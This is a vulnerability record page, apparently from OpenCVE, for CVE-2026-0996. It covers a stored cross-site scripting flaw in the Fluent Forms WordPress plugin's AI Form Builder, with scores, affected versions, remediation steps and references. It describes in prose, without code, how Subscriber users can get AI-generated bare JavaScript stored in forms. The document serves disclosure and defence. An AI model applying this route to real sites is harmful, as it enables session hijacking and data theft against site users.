CVE-2026-0996 - Vulnerability Details

- Fluent Forms <= 6.1.14 - Authenticated (Subscriber+) Stored Cross-Site Scripting via AI Form Builder Module

Description

The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI Form Builder module in all versions up to, and including, 6.1.14 due to a combination of missing authorization checks, a leaked nonce, and insufficient input sanitization. The vulnerability allows Subscriber-level users to trigger AI form generation via a protected endpoint. When prompted, AI services will typically return bare JavaScript code (without <script> tags), which bypasses the plugin's sanitization. This stored JavaScript executes whenever anyone views the generated form, making it possible for authenticated attackers with Subscriber-level access and above to inject arbitrary web scripts that will execute in the context of any user accessing the form.

Published: 2026-02-10

Score: 6.4 Medium

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

The Fluent Forms plugin for WordPress contains a stored cross-site scripting flaw in its AI Form Builder module. The vulnerability arises from missing authorization checks, a leaked nonce, and inadequate input sanitization, allowing authenticated users with Subscriber role or higher to trigger an AI form generation endpoint that returns raw JavaScript. Since the plugin fails to escape the response, the resulting script is stored and executed whenever any visitor loads the form, giving attackers the ability to run arbitrary code in the context of all site users.

Affected Systems

All installations of techjewel’s Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin built up to and including version 6.1.14 are affected. Any WordPress site that incorporates this plugin and grants Subscriber or higher access can be impacted.

Risk and Exploitability

The CVSS score of 6.4 indicates medium severity, while the EPSS score below 1% suggests a very low likelihood of exploitation. The vulnerability is not listed in CISA’s Known Exploited Vulnerabilities catalog. An attacker only needs authenticated access at the Subscriber level or higher. After exploiting the flaw, the injected JavaScript runs for every user who views the compromised form, potentially leading to session hijacking, data theft, or defacement.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

techjewel

Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

unaffected

Version	Status	Constraints
`0`	affected	≤ 6.1.14

No data.

Vendor Product Confidence Versions

Techjewel

Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

—

Version	Status	Scheme	Platform
`[0,*]`	affected	generic	—

Wordpress

—

Version	Status	Scheme	Platform
`—`	unaffected	—	—

Found an issue or want to improve our Enrichment? You can suggest it directly by opening an issue on our dedicated GitHub repository .

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Update Fluent Forms to a version newer than 6.1.14 when available
Temporarily disable the AI Form Builder feature until an official patch is released
Scan existing forms for injected scripts and manually remove any harmful code
Review role permissions to ensure only trusted users have access to the AI form endpoint

Generated by OpenCVE AI on April 16, 2026 at 06:57 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required Low

Scope Changed

Confidentiality Impact Low

Integrity Impact Low

Availability Impact None

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00017.

Exploitation none

Automatable no

Technical Impact partial

References

Link	Providers
https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/app/Hooks/actions.php#L641
https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/app/Modules/Ai/AiFormBuilder.php#L29
https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/app/Modules/Ai/AiFormBuilder.php#L334
https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/boot/globals.php#L438
https://plugins.trac.wordpress.org/changeset/3449710/fluentform/trunk/app/Hooks/actions.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/00192a36-4b75-4dae-9a6e-0afb02ed5bad?source=cve

History

Tue, 10 Feb 2026 16:15:00 +0000

Type	Values Removed	Values Added
Metrics		ssvc `{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}`

Tue, 10 Feb 2026 12:45:00 +0000

Type	Values Removed	Values Added
First Time appeared		Techjewel Techjewel fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder Wordpress Wordpress wordpress
Vendors & Products		Techjewel Techjewel fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder Wordpress Wordpress wordpress

Tue, 10 Feb 2026 06:00:00 +0000

Type	Values Removed	Values Added
Description		The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI Form Builder module in all versions up to, and including, 6.1.14 due to a combination of missing authorization checks, a leaked nonce, and insufficient input sanitization. The vulnerability allows Subscriber-level users to trigger AI form generation via a protected endpoint. When prompted, AI services will typically return bare JavaScript code (without <script> tags), which bypasses the plugin's sanitization. This stored JavaScript executes whenever anyone views the generated form, making it possible for authenticated attackers with Subscriber-level access and above to inject arbitrary web scripts that will execute in the context of any user accessing the form.
Title		Fluent Forms <= 6.1.14 - Authenticated (Subscriber+) Stored Cross-Site Scripting via AI Form Builder Module
Weaknesses		CWE-79
References		https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/app/Hooks/actions.php#L641 https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/app/Modules/Ai/AiFormBuilder.php#L29 https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/app/Modules/Ai/AiFormBuilder.php#L334 https://plugins.trac.wordpress.org/browser/fluentform/tags/6.1.12/boot/globals.php#L438 https://plugins.trac.wordpress.org/changeset/3449710/fluentform/trunk/app/Hooks/actions.php https://www.wordfence.com/threat-intel/vulnerabilities/id/00192a36-4b75-4dae-9a6e-0afb02ed5bad?source=cve
Metrics		cvssV3_1 `{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}`

Subscriptions

Techjewel Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Wordpress Wordpress

MITRE

Status: PUBLISHED

Assigner: Wordfence

Published: 2026-02-10T05:29:42.034Z

Updated: 2026-04-08T16:32:17.369Z

Reserved: 2026-01-15T15:42:36.325Z

Link: CVE-2026-0996

Vulnrichment

Updated: 2026-02-10T15:40:49.973Z

NVD

Status : Deferred

Published: 2026-02-10T06:15:54.320

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-0996

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T07:00:10Z

Weaknesses

CWE-79

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity Low

Privileges Required Low

Scope Changed

Confidentiality Impact Low

Integrity Impact Low

Availability Impact None

User Interaction None

Exploitation none

Automatable no

Technical Impact partial

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object